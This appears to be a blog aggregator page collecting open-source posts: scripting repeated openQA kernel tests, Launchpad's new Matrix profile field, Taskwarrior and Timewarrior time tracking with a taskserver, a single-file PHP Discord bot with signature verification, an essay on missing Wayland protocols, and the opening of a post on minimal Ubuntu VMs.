Special thanks to the QE Kernel team, who do the amazing job of thinking of some scenarios like this, because they save a lot of time.

on January 25, 2024 12:00 AM

layout: post title: Testing kernels with sporadic issues until heisenbug shows in openQA categories:

Now, while hunting for bsc#1219073 which is quite sporadic, and took quite some time to show up often enough so that became noticeable and traceable, once stars aligned and managed to find a way to get a higher failure rate, I wanted to have a way for me and for the developer to test the kernel with the different patches to help with the bisecting and ease the process of finding the culprit and finding a solution for it.

I came with a fairly simple solution, using the --repeat parameter of the openqa-cli tool, and a simple shell script to run it:

```bash
$ cat ~/Downloads/trigger-kernel-openqa-mdadm.sh
# the kernel repo must be the one without https; tests don't have the kernel CA installed
KERNEL="KOTD_REPO=http://download.opensuse.org/repositories/Kernel:/linux-next/standard/"

REPEAT="--repeat 100" # using 100 by default
JOBS="https://openqa.your.instan.ce/tests/13311283 https://openqa.your.instan.ce/tests/13311263 https://openqa.your.instan.ce/tests/13311276 https://openqa.your.instan.ce/tests/13311278"
BUILD="bsc1219073"
for JOB in $JOBS; do 
	openqa-clone-job --within-instance $JOB CASEDIR=https://github.com/foursixnine/os-autoinst-distri-opensuse.git#tellmewhy ${REPEAT} \
		_GROUP=DEVELOPERS ${KERNEL} BUILD=${BUILD} FORCE_SERIAL_TERMINAL=1\
		TEST="${BUILD}_checkmdadm" YAML_SCHEDULE=schedule/qam/QR/15-SP5/textmode/textmode-skip-registration-extra.yaml INSTALLONLY=0 DESKTOP=textmode\
		|& tee jobs-launched.list;
done;

There are few things to note here:

  • the kernel repo must be the one without https; tests don’t have the CA installed by default.
  • the --repeat parameter is set to 100 by default, but can be changed to whatever number is desired.
  • the JOBS variable contains the list of jobs to clone and run, having all supported architecures is recommended (at least for this case)
  • the BUILD variable can be anything, but it’s recommended to use the bug number or something that makes sense.
  • the TEST variable is used to set the name of the test as it will show in the test overview page, you can use TEST+=foo if you want to append text instead of overriding it, the --repeat parameter, will append a number incrementally to your test, see os-autoinst/openQA#5331 for more details.
  • the YAML_SCHEDULE variable is used to set the yaml schedule to use, there are other ways to modify the schedule, but in this case I want to perform a full installation

Running the script

  • Ensure you can run at least the openQA client; if you need API keys, see post linked at the beginning of this post
  • replace the kernel repo with your branch in line 5
  • run the script $ bash trigger-kernel-openqa-mdadm.sh and you should get the following, times the --repeat if you modified it
1 job has been created:
 - sle-15-SP5-Full-QR-x86_64-Build134.5-skip_registration+workaround_modules@64bit -> https://openqa.your.instan.ce/tests/13345270

Each URL, will be a job triggered in openQA, depending on the load and amount of jobs, you might need to wait quite a bit (some users can help moving the priority of these jobs so it executes faster)

The review stuff:

Looking at the results

  • Go to https://openqa.your.instan.ce/tests/overview?distri=sle&build=bsc1219073&version=15-SP5 or from any job from the list above click on Job groups menu at the top, and select Build bsc1219073
  • Click on “Filter”
  • type the name of the test module to filter in the field Module name, e.g mdadm, and select the desired result of such test module e.g failed (you can also type, and select multiple result types)
  • Click Apply
  • The overall summary of the build overview page, will provide you with enough information to calculate the pass/fail rate.

A rule of thumb: anything above 5% is bad, but you need to also understand your sample size + the setup you’re using; YMMV.

Ain’t nobody got time to wait

The script will generate a file called: jobs-launched.list, in case you absolutely need to change the priority of the jobs, set it to 45, so it runs higher than default priority, which is 50 cat jobs-launched.list | grep https | sed -E 's/^.*->\s.*tests\///' | xargs -r -I {} bash -c "openqa-cli api --osd -X POST jobs/{}/prio prio=45; sleep 1"

The magic

The actual magic is in the schedule, so right after booting the system and setting it up, before running the mdadm test, I inserted the update_kernel module, which will add the kernel repo specified by KOTD_REPO, and install the kernel from there, reboot the system, and leave the system ready for the actual test, however I had to add very small changes:

---
 tests/kernel/update_kernel.pm | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/tests/kernel/update_kernel.pm b/tests/kernel/update_kernel.pm
index 1d6312bee0dc..048da593f68f 100644
--- a/tests/kernel/update_kernel.pm
+++ b/tests/kernel/update_kernel.pm
@@ -398,7 +398,7 @@ sub boot_to_console {
 sub run {
     my $self = shift;
 
-    if ((is_ipmi && get_var('LTP_BAREMETAL')) || is_transactional) {
+    if ((is_ipmi && get_var('LTP_BAREMETAL')) || is_transactional || get_var('FORCE_SERIAL_TERMINAL')) {
         # System is already booted after installation, just switch terminal
         select_serial_terminal;
     } else {
@@ -476,7 +476,7 @@ sub run {
         reboot_on_changes;
     } elsif (!get_var('KGRAFT')) {
         power_action('reboot', textmode => 1);
-        $self->wait_boot if get_var('LTP_BAREMETAL');
+        $self->wait_boot if (get_var('FORCE_SERIAL_TERMINAL') || get_var('LTP_BAREMETAL'));
     }
 }
 

Likely I’ll make a new pull request to have this in the test distribution, but for now this is good enough to help kernel developers to do some self-service and trigger their own openQA tests, that have many more tests (hopefully in parallel) and faster than if there was a person doing all of this manually.

Special thanks to the QE Kernel team, who do the amazing job of thinking of some scenarios like this, because they save a lot of time.

on January 25, 2024 12:00 AM

January 22, 2024

Users can now add their Matrix accounts to their profile in Launchpad, as requested by Canonical’s Community team.

We also took the chance to slightly rework the frontend and how we display social accounts in the user profiles. Instead of having different sections in the profile for each social account , all social accounts are now all under a “Social Accounts” section.

Adding a new matrix account to your profile works similarly to how it has always worked for other accounts. Under the “Social Accounts” section in your user profile, you should now see a “No matrix accounts registered” and an edit button that will lead you to the Matrix accounts edit page. To edit, remove or add new ones, you will see an edit button in front of your newly added accounts in your profile.

We also added new API endpoints Person.social_accounts and Person.getSocialAccountsByPlatform() that will list the social accounts for a user. For more information, see our API documentation.

Currently, only Matrix was added as a social platform. But during this process, we made it much easier for Launchpad developers to add new social platforms to Launchpad in the future.

on January 22, 2024 04:30 PM

January 17, 2024

Task management

Colin Watson

Now that I’m freelancing, I need to actually track my time, which is something I’ve had the luxury of not having to do before. That meant something of a rethink of the way I’ve been keeping track of my to-do list. Up to now that was a combination of things like the bug lists for the projects I’m working on at the moment, whatever task tracking system Canonical was using at the moment (Jira when I left), and a giant flat text file in which I recorded logbook-style notes of what I’d done each day plus a few extra notes at the bottom to remind myself of particularly urgent tasks. I could have started manually adding times to each logbook entry, but ugh, let’s not.

In general, I had the following goals (which were a bit reminiscent of my address book):

  • free software throughout
  • storage under my control
  • ability to annotate tasks with URLs (especially bugs and merge requests)
  • lightweight time tracking (I’m OK with having to explicitly tell it when I start and stop tasks)
  • ability to drive everything from the command line
  • decent filtering so I don’t have to look at my entire to-do list all the time
  • ability to easily generate billing information for multiple clients
  • optionally, integration with Android (mainly so I can tick off personal tasks like “change bedroom lightbulb” or whatever that don’t involve being near a computer)

I didn’t do an elaborate evaluation of multiple options, because I’m not trying to come up with the best possible solution for a client here. Also, there are a bazillion to-do list trackers out there and if I tried to evaluate them all I’d never do anything else. I just wanted something that works well enough for me.

Since it came up on Mastodon: a bunch of people swear by Org mode, which I know can do at least some of this sort of thing. However, I don’t use Emacs and don’t plan to use Emacs. nvim-orgmode does have some support for time tracking, but when I’ve tried vim-based versions of Org mode in the past I’ve found they haven’t really fitted my brain very well.

Taskwarrior and Timewarrior

One of the other Freexian collaborators mentioned Taskwarrior and Timewarrior, so I had a look at those.

The basic idea of Taskwarrior is that you have a task command that tracks each task as a blob of JSON and provides subcommands to let you add, modify, and remove tasks with a minimum of friction. task add adds a task, and you can add metadata like project:Personal (I always make sure every task has a project, for ease of filtering). Just running task shows you a task list sorted by Taskwarrior’s idea of urgency, with an ID for each task, and there are various other reports with different filtering and verbosity. task <id> annotate lets you attach more information to a task. task <id> done marks it as done. So far so good, so a redacted version of my to-do list looks like this:

$ task ls

ID A Project     Tags                 Description
17   Freexian                         Add Incus support to autopkgtest [2]
 7   Columbiform                      Figure out Lloyds online banking [1]
 2   Debian                           Fix troffcvt for groff 1.23.0 [1]
11   Personal                         Replace living room curtain rail

Once I got comfortable with it, this was already a big improvement. I haven’t bothered to learn all the filtering gadgets yet, but it was easy enough to see that I could do something like task all project:Personal and it’d show me both pending and completed tasks in that project, and that all the data was stored in ~/.task - though I have to say that there are enough reporting bells and whistles that I haven’t needed to poke around manually. In combination with the regular backups that I do anyway (you do too, right?), this gave me enough confidence to abandon my previous text-file logbook approach.

Next was time tracking. Timewarrior integrates with Taskwarrior, albeit in an only semi-packaged way, and it was easy enough to set that up. Now I can do:

$ task 25 start
Starting task 00a9516f 'Write blog post about task tracking'.
Started 1 task.
Note: '"Write blog post about task tracking"' is a new tag.
Tracking Columbiform "Write blog post about task tracking"
  Started 2024-01-10T11:28:38
  Current                  38
  Total               0:00:00
You have more urgent tasks.
Project 'Columbiform' is 25% complete (3 of 4 tasks remaining).

When I stop work on something, I do task active to find the ID, then task <id> stop. Timewarrior does the tedious stopwatch business for me, and I can manually enter times if I forget to start/stop a task. Then the really useful bit: I can do something like timew summary :month <name-of-client> and it tells me how much to bill that client for this month. Perfect.

I also started using VIT to simplify the day-to-day flow a little, which means I’m normally just using one or two keystrokes rather than typing longer commands. That isn’t really necessary from my point of view, but it does save some time.

Android integration

I left Android integration for a bit later since it wasn’t essential. When I got round to it, I have to say that it felt a bit clumsy, but it did eventually work.

The first step was to set up a taskserver. Most of the setup procedure was OK, but I wanted to use Let’s Encrypt to minimize the amount of messing around with CAs I had to do. Getting this to work involved hitting things with sticks a bit, and there’s still a local CA involved for client certificates. What I ended up with was a certbot setup with the webroot authenticator and a custom deploy hook as follows (with cert_name replaced by a DNS name in my house domain):

#! /bin/sh
set -eu

cert_name=taskd.example.org

found=false
for domain in $RENEWED_DOMAINS; do
    case "$domain" in
        $cert_name)
            found=:
            ;;
    esac
done
$found || exit 0

install -m 644 "/etc/letsencrypt/live/$cert_name/fullchain.pem" \
    /var/lib/taskd/pki/fullchain.pem
install -m 640 -g Debian-taskd "/etc/letsencrypt/live/$cert_name/privkey.pem" \
    /var/lib/taskd/pki/privkey.pem

systemctl restart taskd.service

I could then set this in /etc/taskd/config (server.crl.pem and ca.cert.pem were generated using the documented taskserver setup procedure):

server.key=/var/lib/taskd/pki/privkey.pem
server.cert=/var/lib/taskd/pki/fullchain.pem
server.crl=/var/lib/taskd/pki/server.crl.pem
ca.cert=/var/lib/taskd/pki/ca.cert.pem

Then I could set taskd.ca on my laptop to /usr/share/ca-certificates/mozilla/ISRG_Root_X1.crt and otherwise follow the client setup instructions, run task sync init to get things started, and then task sync every so often to sync changes between my laptop and the taskserver.

I used TaskWarrior Mobile as the client. I have to say I wouldn’t want to use that client as my primary task tracking interface: the setup procedure is clunky even beyond the necessity of copying a client certificate around, it expects you to give it a .taskrc rather than having a proper settings interface for that, and it only seems to let you add a task if you specify a due date for it. It also lacks Timewarrior integration, so I can only really use it when I don’t care about time tracking, e.g. personal tasks. But that’s really all I need, so it meets my minimum requirements.

Next?

Considering this is literally the first thing I tried, I have to say I’m pretty happy with it. There are a bunch of optional extras I haven’t tried yet, but in general it kind of has the vim nature for me: if I need something it’s very likely to exist or easy enough to build, but the features I don’t use don’t get in my way.

I wouldn’t recommend any of this to somebody who didn’t already spend most of their time in a terminal - but I do. I’m glad people have gone to all the effort to build this so I didn’t have to.

on January 17, 2024 01:28 PM

January 14, 2024

Discord have changed the way bots work quite a few times. Recently, though, they built a system that lets you create and register “slash commands” — commands that you can type into the Discord chat and which do things, like /hello — and which are powered by “webhooks”. That is: when someone uses your command, it sends an HTTP request to a URL of your choice, and your URL then responds, and that process powers what your users see in Discord. Importantly, this means that operating a Discord bot does not require a long-running server process. You don’t need to host it somewhere where you worry about the bot process crashing, how you’re going to recover from that, all that stuff. No daemon required. In fact, you can make a complete Discord bot in one single PHP file. You don’t even need any PHP libraries. One file, which you upload to your completely-standard shared hosting webspace, the same way you might upload any other simple PHP thing. Here’s some notes on how I did that.

The Discord documentation is pretty annoying and difficult to follow; all the stuff you need is in there, somewhere, but it’s often hard to find where, and there’s very little that explains why a thing is the way it is. It’s tough to grasp the “Zen” of how Discord wants you to work with their stuff. But in essence, you’ll need to create a Discord app: follow their instructions to do that. Then, we’ll write our small PHP file, and upload it; finally, fill in the URL of that PHP file as the “interactive endpoint URL” in your newly-created app’s general information page in the Discord developer admin. You can then add the bot to a server by visiting the URL from the “URL generator” for your app in the Discord dev admin.

The PHP file will get sent blocks of JSON, which describe what a user is doing — a command they’ve typed, parameters to that command, or whatever — and respond with something which is shown to the user — the text of a message which is your bot’s reply, or a command to alter the text of a previous message, or add a clickable button to it, and the like. I won’t go into detail about all the things you can do here (if that would be interesting, let me know and maybe I’ll write a followup or two), but the basic structure of your bot needs to be that it authenticates the incoming request from Discord, it interprets that request, and it responds to that request.

Authentication first. When you create your app, you get a client_public_key value, a big long string of hex digits that will look like c78c32c3c7871369fa67 or whatever. Your PHP file needs to know this value somehow. (How you do that is up to you; think of this like a MySQL username and password, and handle this the same way you do those.) Then, every request that comes in will have two important HTTP headers: X-Signature-ED25519 and X-Signature-Timestamp. You use a combination of these (which provide a signature for the incoming request) and your public key to check whether the request is legitimate. There are PHP libraries to do this, but fortunately we don’t need them; PHP has the relevant signature verification stuff built in, these days. So, to read the content of the incoming post and verify the signature on it:

/* read the incoming request data */
$postData = file_get_contents('php://input');
/* get the signature and timestamp header values */
$signature = isset($_SERVER['HTTP_X_SIGNATURE_ED25519']) ? 
    $_SERVER['HTTP_X_SIGNATURE_ED25519'] : "";
$timestamp = isset($_SERVER['HTTP_X_SIGNATURE_TIMESTAMP']) ? 
    $_SERVER['HTTP_X_SIGNATURE_TIMESTAMP'] : "";
/* check the signature */
$sigok = sodium_crypto_sign_verify_detached(
    hex2bin($signature), 
    $timestamp . $postData,
    hex2bin($client_public_key));
/* If signature is not OK, reject the request */
if (!$sigok) {
    http_response_code(401);
    die();
}

We need to correctly reject invalidly signed requests, because Discord will check that we do — they will occasionally send test requests with bad signatures to confirm that you’re doing the check. (They do this when you first add the URL to the Discord admin screens; if it won’t let you save the settings, then it’s because Discord thinks your URL returned the wrong thing. This is annoying, because you have no idea why Discord didn’t like it; best bet is to add lots of error_log() logging of inputs and outputs to your PHP file and inspect the results carefully.)

Next, interpret the incoming request and do things with it. The only thing we have to respond to here is a ping message; Discord will send them as part of their irregular testing, and expects to get back a correctly-formatted pong message.

$data = json_decode($postData);
if ($data->type == 1) { // this is a ping message
    echo json_encode(array('type' => 1)); // response: pong
    die();
}

The magic numbers there (1 for a ping, 1 for a pong) are both defined in the Discord docs (incoming values being the “Interaction Type” field and outgoing values the “Interaction Callback Type”.)

After that, the world’s approximately your oyster. You check the incoming type field for the type of incoming thing this is — a slash command, a button click in a message, whatever — and respond appropriately. This is all stuff for future posts if there’s interest, but the docs (in particular the “receiving and responding and “message components” sections) have all the detail. For your bot to provide a slash command, you have to register it first, which is a faff; I wrote a little Python script to do that. You only have to do it once. The script looks approximately like this; you’ll need your APP_ID and your BOT_TOKEN from the Discord dashboard.

import requests, json
MY_COMMAND = {
    "name": 'doit',
    "description": 'Do the thing',
    "type": 1
}
discord_endpoint = _
    f"https://discord.com/api/v10/applications/{APP_ID}/commands"
requests.request("PUT", discord_endpoint, 
    json=[MY_COMMAND], headers={
        "Authorization": f"Bot {BOT_TOKEN}",
        "User-Agent": 'mybotname (myboturl, 1.0.0)',
})

Once you’ve done that, you can use /doit in a channel with your bot in, and your PHP bot URL will receive the incoming request for you to process.

on January 14, 2024 09:57 PM

January 11, 2024

This post is in part a response to an aspect of Nate’s post “Does Wayland really break everything?“, but also my reflection on discussing Wayland protocol additions, a unique pleasure that I have been involved with for the past months1.

Some facts

Before I start I want to make a few things clear: The Linux desktop will be moving to Wayland2 – this is a fact at this point (and has been for a while), sticking to X11 makes no sense for future projects. From reading Wayland protocols and working with it at a much lower level than I ever wanted to, it is also very clear to me that Wayland is an exceptionally well-designed core protocol, and so are the additional extension protocols (xdg-shell & Co.). The modularity of Wayland is great, it gives it incredible flexibility and will for sure turn out to be good for the long-term viability of this project (and also provides a path to correct protocol issues in future, if one is found). In other words: Wayland is an amazing foundation to build on, and a lot of its design decisions make a lot of sense!

The shift towards people seeing “Linux” more as an application developer platform, and taking PipeWire and XDG Portals into account when designing for Wayland is also an amazing development and I love to see this – this holistic approach is something I always wanted!

Furthermore, I think Wayland removes a lot of functionality that shouldn’t exist in a modern compositor – and that’s a good thing too! Some of X11’s features and design decisions had clear drawbacks that we shouldn’t replicate. I highly recommend to read Nate’s blog post, it’s very good and goes into more detail. And due to all of this, I firmly believe that any advancement in the Wayland space must come from within the project.

But!

But! Of course there was a “but” coming 😉 – I think while developing Wayland-as-an-ecosystem we are now entrenched into narrow concepts of how a desktop should work. While discussing Wayland protocol additions, a lot of concepts clash, people from different desktops with different design philosophies debate the merits of those over and over again never reaching any conclusion (just as you will never get an answer out of humans whether sushi or pizza is the clearly superior food, or whether CSD or SSD is better). Some people want to use Wayland as a vehicle to force applications to submit to their desktop’s design philosophies, others prefer the smallest and leanest protocol possible, other developers want the most elegant behavior possible. To be clear, I think those are all very valid approaches.

But this also creates problems: By switching to Wayland compositors, we are already forcing a lot of porting work onto toolkit developers and application developers. This is annoying, but just work that has to be done. It becomes frustrating though if Wayland provides toolkits with absolutely no way to reach their goal in any reasonable way. For Nate’s Photoshop analogy: Of course Linux does not break Photoshop, it is Adobe’s responsibility to port it. But what if Linux was missing a crucial syscall that Photoshop needed for proper functionality and Adobe couldn’t port it without that? In that case it becomes much less clear on who is to blame for Photoshop not being available.

A lot of Wayland protocol work is focused on the environment and design, while applications and work to port them often is considered less. I think this happens because the overlap between application developers and developers of the desktop environments is not necessarily large, and the overlap with people willing to engage with Wayland upstream is even smaller. The combination of Windows developers porting apps to Linux and having involvement with toolkits or Wayland is pretty much nonexistent. So they have less of a voice.

A quick detour through the neuroscience research lab

I have been involved with Freedesktop, GNOME and KDE for an incredibly long time now (more than a decade), but my actual job (besides consulting for Purism) is that of a PhD candidate in a neuroscience research lab (working on the morphology of biological neurons and its relation to behavior). I am mostly involved with three research groups in our institute, which is about 35 people. Most of us do all our data analysis on powerful servers which we connect to using RDP (with KDE Plasma as desktop). Since I joined, I have been pushing the envelope a bit to extend Linux usage to data acquisition and regular clients, and to have our data acquisition hardware interface well with it. Linux brings some unique advantages for use in research, besides the obvious one of having every step of your data management platform introspectable with no black boxes left, a goal I value very highly in research (but this would be its own blogpost).

In terms of operating system usage though, most systems are still Windows-based. Windows is what companies develop for, and what people use by default and are familiar with. The choice of operating system is very strongly driven by application availability, and WSL being really good makes this somewhat worse, as it removes the need for people to switch to a real Linux system entirely if there is the occasional software requiring it. Yet, we have a lot more Linux users than before, and use it in many places where it makes sense. I also developed a novel data acquisition software that even runs on Linux-only and uses the abilities of the platform to its fullest extent. All of this resulted in me asking existing software and hardware vendors for Linux support a lot more often. Vendor-customer relationship in science is usually pretty good, and vendors do usually want to help out. Same for open source projects, especially if you offer to do Linux porting work for them… But overall, the ease of use and availability of required applications and their usability rules supreme. Most people are not technically knowledgeable and just want to get their research done in the best way possible, getting the best results with the least amount of friction.

KDE/Linux usage at a control station for a particle accelerator at Adlershof Technology Park, Germany, for reference (by 25years of KDE)3

Back to the point

The point of that story is this: GNOME, KDE, RHEL, Debian or Ubuntu: They all do not matter if the necessary applications are not available for them. And as soon as they are, the easiest-to-use solution wins. There are many facets of “easiest”: In many cases this is RHEL due to Red Hat support contracts being available, in many other cases it is Ubuntu due to its mindshare and ease of use. KDE Plasma is also frequently seen, as it is perceived a bit easier to onboard Windows users with it (among other benefits). Ultimately, it comes down to applications and 3rd-party support though.

Here’s a dirty secret: In many cases, porting an application to Linux is not that difficult. The thing that companies (and FLOSS projects too!) struggle with and will calculate the merits of carefully in advance is whether it is worth the support cost as well as continuous QA/testing. Their staff will have to do all of that work, and they could spend that time on other tasks after all.

So if they learn that “porting to Linux” not only means added testing and support, but also means to choose between the legacy X11 display server that allows for 1:1 porting from Windows or the “new” Wayland compositors that do not support the same features they need, they will quickly consider it not worth the effort at all. I have seen this happen.

Of course many apps use a cross-platform toolkit like Qt, which greatly simplifies porting. But this just moves the issue one layer down, as now the toolkit needs to abstract Windows, macOS and Wayland. And Wayland does not contain features to do certain things or does them very differently from e.g. Windows, so toolkits have no way to actually implement the existing functionality in a way that works on all platforms. So in Qt’s documentation you will often find texts like “works everywhere except for on Wayland compositors or mobile”4.

Many missing bits or altered behavior are just papercuts, but those add up. And if users will have a worse experience, this will translate to more support work, or people not wanting to use the software on the respective platform.

What’s missing?

Window positioning

SDI applications with multiple windows are very popular in the scientific world. For data acquisition (for example with microscopes) we often have one monitor with control elements and one larger one with the recorded image. There is also other configurations where multiple signal modalities are acquired, and the experimenter aligns windows exactly in the way they want and expects the layout to be stored and to be loaded upon reopening the application. Even in the image from Adlershof Technology Park above you can see this style of UI design, at mega-scale. Being able to pop-out elements as windows from a single-window application to move them around freely is another frequently used paradigm, and immensely useful with these complex apps.

It is important to note that this is not a legacy design, but in many cases an intentional choice – these kinds of apps work incredibly well on larger screens or many screens and are very flexible (you can have any window configuration you want, and switch between them using the (usually) great window management abilities of your desktop).

Of course, these apps will work terribly on tablets and small form factors, but that is not the purpose they were designed for and nobody would use them that way.

I assumed for sure these features would be implemented at some point, but when it became clear that that would not happen, I created the ext-placement protocol which had some good discussion but was ultimately rejected from the xdg namespace. I then tried another solution based on feedback, which turned out not to work for most apps, and now proposed xdg-placement (v2) in an attempt to maybe still get some protocol done that we can agree on, exploring more options before pushing the existing protocol for inclusion into the ext Wayland protocol namespace. Meanwhile though, we can not port any application that needs this feature, while at the same time we are switching desktops and distributions to Wayland by default.

Window position restoration

Similarly, a protocol to save & restore window positions was already proposed in 2018, 6 years ago now, but it has still not been agreed upon, and may not even help multiwindow apps in its current form. The absence of this protocol means that applications can not restore their former window positions, and the user has to move them to their previous place again and again.

Meanwhile, toolkits can not adopt these protocols and applications can not use them and can not be ported to Wayland without introducing papercuts.

Window icons

Similarly, individual windows can not set their own icons, and not-installed applications can not have an icon at all because there is no desktop-entry file to load the icon from and no icon in the theme for them. You would think this is a niche issue, but for applications that create many windows, providing icons for them so the user can find them is fairly important. Of course it’s not the end of the world if every window has the same icon, but it’s one of those papercuts that make the software slightly less user-friendly. Even applications with fewer windows like LibrePCB are affected, so much so that they rather run their app through Xwayland for now.

I decided to address this after I was working on data analysis of image data in a Python virtualenv, where my code and the Python libraries used created lots of windows all with the default yellow “W” icon, making it impossible to distinguish them at a glance. This is xdg-toplevel-icon now, but of course it is an uphill battle where the very premise of needing this is questioned. So applications can not use it yet.

Limited window abilities requiring specialized protocols

Firefox has a picture-in-picture feature, allowing it to pop out media from a mediaplayer as separate floating window so the user can watch the media while doing other things. On X11 this is easily realized, but on Wayland the restrictions posed on windows necessitate a different solution. The xdg-pip protocol was proposed for this specialized usecase, but it is also not merged yet. So this feature does not work as well on Wayland.

Automated GUI testing / accessibility / automation

Automation of GUI tasks is a powerful feature, so is the ability to auto-test GUIs. This is being worked on, with libei and wlheadless-run (and stuff like ydotool exists too), but we’re not fully there yet.

Wayland is frustrating for (some) application authors

As you see, there is valid applications and valid usecases that can not be ported yet to Wayland with the same feature range they enjoyed on X11, Windows or macOS. So, from an application author’s perspective, Wayland does break things quite significantly, because things that worked before can no longer work and Wayland (the whole stack) does not provide any avenue to achieve the same result.

Wayland does “break” screen sharing, global hotkeys, gaming latency (via “no tearing”) etc, however for all of these there are solutions available that application authors can port to. And most developers will gladly do that work, especially since the newer APIs are usually a lot better and more robust. But if you give application authors no path forward except “use Xwayland and be on emulation as second-class citizen forever”, it just results in very frustrated application developers.

For some application developers, switching to a Wayland compositor is like buying a canvas from the Linux shop that forces your brush to only draw triangles. But maybe for your avant-garde art, you need to draw a circle. You can approximate one with triangles, but it will never be as good as the artwork of your friends who got their canvases from the Windows or macOS art supply shop and have more freedom to create their art.

Triangles are proven to be the best shape! If you are drawing circles you are creating bad art!

Wayland, via its protocol limitations, forces a certain way to build application UX – often for the better, but also sometimes to the detriment of users and applications. The protocols are often fairly opinionated, a result of the lessons learned from X11. In any case though, it is the odd one out – Windows and macOS do not pose the same limitations (for better or worse!), and the effort to port to Wayland is orders of magnitude bigger, or sometimes in case of the multiwindow UI paradigm impossible to achieve to the same level of polish. Desktop environments of course have a design philosophy that they want to push, and want applications to integrate as much as possible (same as macOS and Windows!). However, there are many applications out there, and pushing a design via protocol limitations will likely just result in fewer apps.

The porting dilemma

I spent probably way too much time looking into how to get applications cross-platform and running on Linux, often talking to vendors (FLOSS and proprietary) as well. Wayland limitations aren’t the biggest issue by far, but they do start to come come up now, especially in the scientific space with Ubuntu having switched to Wayland by default. For application authors there is often no way to address these issues. Many scientists do not even understand why their Python script that creates some GUIs suddenly behaves weirdly because Qt is now using the Wayland backend on Ubuntu instead of X11. They do not know the difference and also do not want to deal with these details – even though they may be programmers as well, the real goal is not to fiddle with the display server, but to get to a scientific result somehow.

Another issue is portability layers like Wine which need to run Windows applications as-is on Wayland. Apparently Wine’s Wayland driver has some heuristics to make window positioning work (and I am amazed by the work done on this!), but that can only go so far.

A way out?

So, how would we actually solve this? Fundamentally, this excessively long blog post boils down to just one essential question:

Do we want to force applications to submit to a UX paradigm unconditionally, potentially loosing out on application ports or keeping apps on X11 eternally, or do we want to throw them some rope to get as many applications ported over to Wayland, even through we might sacrifice some protocol purity?

I think we really have to answer that to make the discussions on wayland-protocols a lot less grueling. This question can be answered at the wayland-protocols level, but even more so it must be answered by the individual desktops and compositors.

If the answer for your environment turns out to be “Yes, we want the Wayland protocol to be more opinionated and will not make any compromises for application portability”, then your desktop/compositor should just immediately NACK protocols that add something like this and you simply shouldn’t engage in the discussion, as you reject the very premise of the new protocol: That it has any merit to exist and is needed in the first place. In this case contributors to Wayland and application authors also know where you stand, and a lot of debate is skipped. Of course, if application authors want to support your environment, you are basically asking them now to rewrite their UI, which they may or may not do. But at least they know what to expect and how to target your environment.

If the answer turns out to be “We do want some portability”, the next question obviously becomes where the line should be drawn and which changes are acceptable and which aren’t. We can’t blindly copy all X11 behavior, some porting work to Wayland is simply inevitable. Some written rules for that might be nice, but probably more importantly, if you agree fundamentally that there is an issue to be fixed, please engage in the discussions for the respective MRs! We for sure do not want to repeat X11 mistakes, and I am certain that we can implement protocols which provide the required functionality in a way that is a nice compromise in allowing applications a path forward into the Wayland future, while also being as good as possible and improving upon X11. For example, the toplevel-icon proposal is already a lot better than anything X11 ever had. Relaxing ACK requirements for the ext namespace is also a good proposed administrative change, as it allows some compositors to add features they want to support to the shared repository easier, while also not mandating them for others. In my opinion, it would allow for a lot less friction between the two different ideas of how Wayland protocol development should work. Some compositors could move forward and support more protocol extensions, while more restrictive compositors could support less things. Applications can detect supported protocols at launch and change their behavior accordingly (ideally even abstracted by toolkits).

You may now say that a lot of apps are ported, so surely this issue can not be that bad. And yes, what Wayland provides today may be enough for 80-90% of all apps. But what I hope the detour into the research lab has done is convince you that this smaller percentage of apps matters. A lot. And that it may be worthwhile to support them.

To end on a positive note: When it came to porting concrete apps over to Wayland, the only real showstoppers so far5 were the missing window-positioning and window-position-restore features. I encountered them when porting my own software, and I got the issue as feedback from colleagues and fellow engineers. In second place was UI testing and automation support, the window-icon issue was mentioned twice, but being a cosmetic issue it likely simply hurts people less and they can ignore it easier.

What this means is that the majority of apps are already fine, and many others are very, very close! A Wayland future for everyone is within our grasp! 😄

I will also bring my two protocol MRs to their conclusion for sure, because as application developers we need clarity on what the platform (either all desktops or even just a few) supports and will or will not support in future. And the only way to get something good done is by contribution and friendly discussion.

Footnotes

  1. Apologies for the clickbait-y title – it comes with the subject 😉 ↩
  2. When I talk about “Wayland” I mean the combined set of display server protocols and accepted protocol extensions, unless otherwise clarified. ↩
  3. I would have picked a picture from our lab, but that would have needed permission first ↩
  4. Qt has awesome “platform issues” pages, like for macOS and Linux/X11 which help with porting efforts, but Qt doesn’t even list Linux/Wayland as supported platform. There is some information though, like window geometry peculiarities, which aren’t particularly helpful when porting (but still essential to know). ↩
  5. Besides issues with Nvidia hardware – CUDA for simulations and machine-learning is pretty much everywhere, so Nvidia cards are common, which causes trouble on Wayland still. It is improving though. ↩
on January 11, 2024 04:24 PM

November 30, 2023

Every so often I have to make a new virtual machine for some specific use case. Perhaps I need a newer version of Ubuntu than the one I’m running on my hardware in order to build some software, and containerization just isn’t working. Or maybe I need to test an app that I made modifications to in a fresh environment. In these instances, it can be quite helpful to be able to spin up these virtual machines quickly, and only install the bare minimum software you need for your use case.

One common strategy when making a minimal or specially customized install is to use a server distro (like Ubuntu Server for instance) as the base and then install other things on top of it. This sorta works, but it’s less than ideal for a couple reasons:

  • Server distros are not the same as minimal distros. They may provide or offer software and configurations that are intended for a server use case. For instance, the ubuntu-server metapackage in Ubuntu depends on software intended for RAID array configuration and logical volume management, and it recommends software that enables LXD virtual machine related features. Chances are you don’t need or want these sort of things.

  • They can be time-consuming to set up. You have to go through the whole server install procedure, possibly having to configure or reconfigure things that are pointless for your use case, just to get the distro to install. Then you have to log in and customize it, adding an extra step.

If you’re able to use Debian as your distro, these problems aren’t so bad since Debian is sort of like Arch Linux - there’s a minimal base that you build on to turn it into a desktop or server. But for Ubuntu, there’s desktop images (not usually what you want), server images (not usually what you want), cloud images (might be usable but could be tricky), and Ubuntu Core images (definitely not what you want for most use cases). So how exactly do you make a minimal Ubuntu VM?

As hinted at above, a cloud image might work, but we’re going to use a different solution here. As it turns out, you don’t actually have to use a prebuilt image or installer to install Ubuntu. Similar to the installation procedure Arch Linux provides, you can install Ubuntu manually, giving you very good control over what goes into your VM and how it’s configured.

